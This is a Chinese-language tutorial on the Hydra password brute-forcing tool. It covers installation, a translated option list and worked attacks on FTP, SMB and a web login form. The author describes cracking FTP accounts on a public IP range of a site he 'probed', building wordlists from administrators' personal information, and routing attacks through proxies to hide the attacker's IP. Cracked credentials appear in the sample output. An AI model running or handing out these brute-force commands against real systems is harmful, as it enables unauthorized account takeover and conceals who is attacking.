hydra著名黑客組織thc的一款開源的暴力破解工具,可以破解多種密碼。其官網(wǎng)http://www.thc.org,本文測試版本為最新版本5.8,可支持
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL,MYSQL,
REXEC,RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3,IMAP,
NNTP, PCNFS,ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak,
Cisco auth, Cisco enable,AFP, LDAP2, Cisco AAA
等密碼破解。唯一覺得不大方便的是,用于密碼破解的字典必須我們自己制作指定
0x01安裝手記
cd到下載好的安裝程序目錄,解壓軟件包
sudo tar zxvf hydra-5.8-src.tar.gz
得到hydra-5.8-src文件夾,進入該文件夾,按照安裝說明首先進行配置
sudo ./configure
會檢測到當前系統(tǒng)一些組建配置,主要是對于破解支持模塊的檢測,大家根據(jù)需要安裝對應(yīng)的支持庫和依賴包,在以后實戰(zhàn)過程我可能會提到
相關(guān)模塊。
直接繼續(xù)編譯,sudo make和sudo makeinstall,這樣就安裝完成了。另外值得說明的是,該軟件支持GUI的人性化界面,個人不推薦,感興趣
的朋友可以到官網(wǎng)下載頁面查看。
0x02參數(shù)詳解(官網(wǎng)是英文,下面我翻譯成中文)
格式: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-ens]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT][-S] [-vV]
server service [OPT] # 可選的
-R 繼續(xù)從上一次進度接著破解
-S 采用SSL鏈接(大寫的S)
-s PORT 如果非默認端口,可通過這個參數(shù)指定
-l LOGIN 小寫,用于指定破解的用戶,對特定用戶破解
-L FILE 大寫,用于指定用戶的用戶名字典
-p PASS 小寫,用于指定密碼破解,少用,一般是采用密碼字典
-P FILE 大寫,用于指定密碼字典
-e ns 額外的選項,n:空密碼試探,s:使用指定賬戶和密碼試探
-C FILE 使用冒號分割格式 例如 "登錄名:密碼"來代替-L/-P參數(shù)
-M FILE 指定目標列表文件一行一條
-o FILE 指定結(jié)果輸出文件
-f 在使用-M參數(shù)以后找到第一對登錄名或者密碼的時候中止破解
-t TASKS 同時運行的線程數(shù),默認為16
-w TIME 設(shè)置最大超時的時間,單位秒,默認是30s
-v / -V 顯示詳細過程
server 目標ip
service 指定服務(wù)名,支持如下: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnthttp-{head|get} http-{get|post}-form http-proxy
cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listenerpostgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq
sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthdfirebird ncp afp
OPT 可選項
如何使用代理服務(wù)器進行破解(這一點主要處于攻擊者的ip,處于自身安全考慮)
----------------------------
HYDRA_PROXY_HTTP 變量參數(shù)可以用來定義代理服務(wù)器(只能使用http代理)
語法:
HYDRA_PROXY_HTTP="http://ip:port/"
HYDRA_PROXY_CONNECT=ip:8000
如果你使用的代理需要用戶名和密碼,請使用HYDRA_PROXY_AUTH 變量參數(shù):
HYDRA_PROXY_AUTH="the_login:the_password"
0x03實例破解
1.ftp密碼破解
結(jié)合自己實例,最近試探一個網(wǎng)站,得到了ftp用戶,是serv-u6.02但是無法破解密碼,我通過收集這些ftp用戶將結(jié)果保存在ftpuser.lst文件
中,同時通過收集各個網(wǎng)站的信息,包括管理員的信息組合形成一個密碼字典ftppwd.lst。于是,就開始嘗試破解,命令如下:
sudo hydra -L /home/dict/ftpuser.lst -P /home/dict/ftppwd.lst218.86.103.* ftp
這個是基于多用戶密碼破解,另外還有一個本地ftp密碼破解方案。為了效率我直接將密碼寫入到pwd.lst字典中
sudo hydra -l administrator -P /home/dict/pwd.lst -v 192.168.8.6ftp
返回結(jié)果如下,成功破解了密碼:
# 該行說明任務(wù)總數(shù),會根據(jù)你提供用戶名和密碼進行計算,l:1/p:2表示一個用戶名,密碼字典中又2個密碼
[DATA] 2 tasks, 1 servers, 2 login tries (l:1/p:2), ~1 tries pertask
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[STATUS] attack finished for 192.168.8.6 (waiting for childs tofinish)
# 破解成功,直接顯示出來,當然你可以讓他輸出到文件,通過參數(shù)-o設(shè)定
[21][ftp] host: 192.168.8.6 login: administrator password:123
通過這種方法有極大可能破解這個ftp,當然關(guān)鍵在于你的字典,我們可以通過字典生成器就可以很好的破解了。
2.samba密碼破解
利用nmap掃描到服務(wù)器開啟了samba服務(wù),于是嘗試收集該服務(wù)器信息組合成密碼字典。由于該應(yīng)用類似ftp破解,這里不對具體演示,只是將
ftp服務(wù)改成smb服務(wù)即可。
3.網(wǎng)站后臺密碼破解
該軟件的強大之處就在于支持多種協(xié)議的破解,同樣他也支持對于web用戶界面的登錄破解,get方式提交的表單比較簡單,這里通過post方式
提交密碼破解提供思路。該工具又一個不好的地方就是,如果目標網(wǎng)站登錄時候需要驗證碼無法破解了。帶參數(shù)破解如下:

<form action="index.php"method="POST">
<input type="text" name="name"/><BR><br>
<input type="password" name="pwd"/><br><br>
<input type="submit" name="sub"value="提交">
</form>
假設(shè)有以上一個密碼登錄表單,我們執(zhí)行命令:
sudo hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1http-post-form
“index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”
#破解的用戶名是admin,密碼字典是pass.lst,破解結(jié)果保存在ok.lst,-t是同時線程數(shù)為1,-f是當破解了一個密碼就停止,ip是本地,就
是目標ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解
后面參數(shù)是網(wǎng)頁中對應(yīng)的表單字段的name屬性,后面<title>中的內(nèi)容是表示錯誤猜解的返回信息提示,可以自定義。
0x04總結(jié)
該工具的強大只有你自行體驗了,當然密碼能否破解關(guān)鍵在于你的字典。以上一些實例操作僅僅是提供的支持的眾多服務(wù)中的3種,其他的服務(wù)
也同樣非常強大,留給大家自行體會。其實密碼字典的生成有相關(guān)的工具,你可以自己生成符合一定規(guī)則的密碼字典。當然如果你是一個成功
的社工專家,往往能夠得到事半功倍的效果。
愛華網(wǎng)



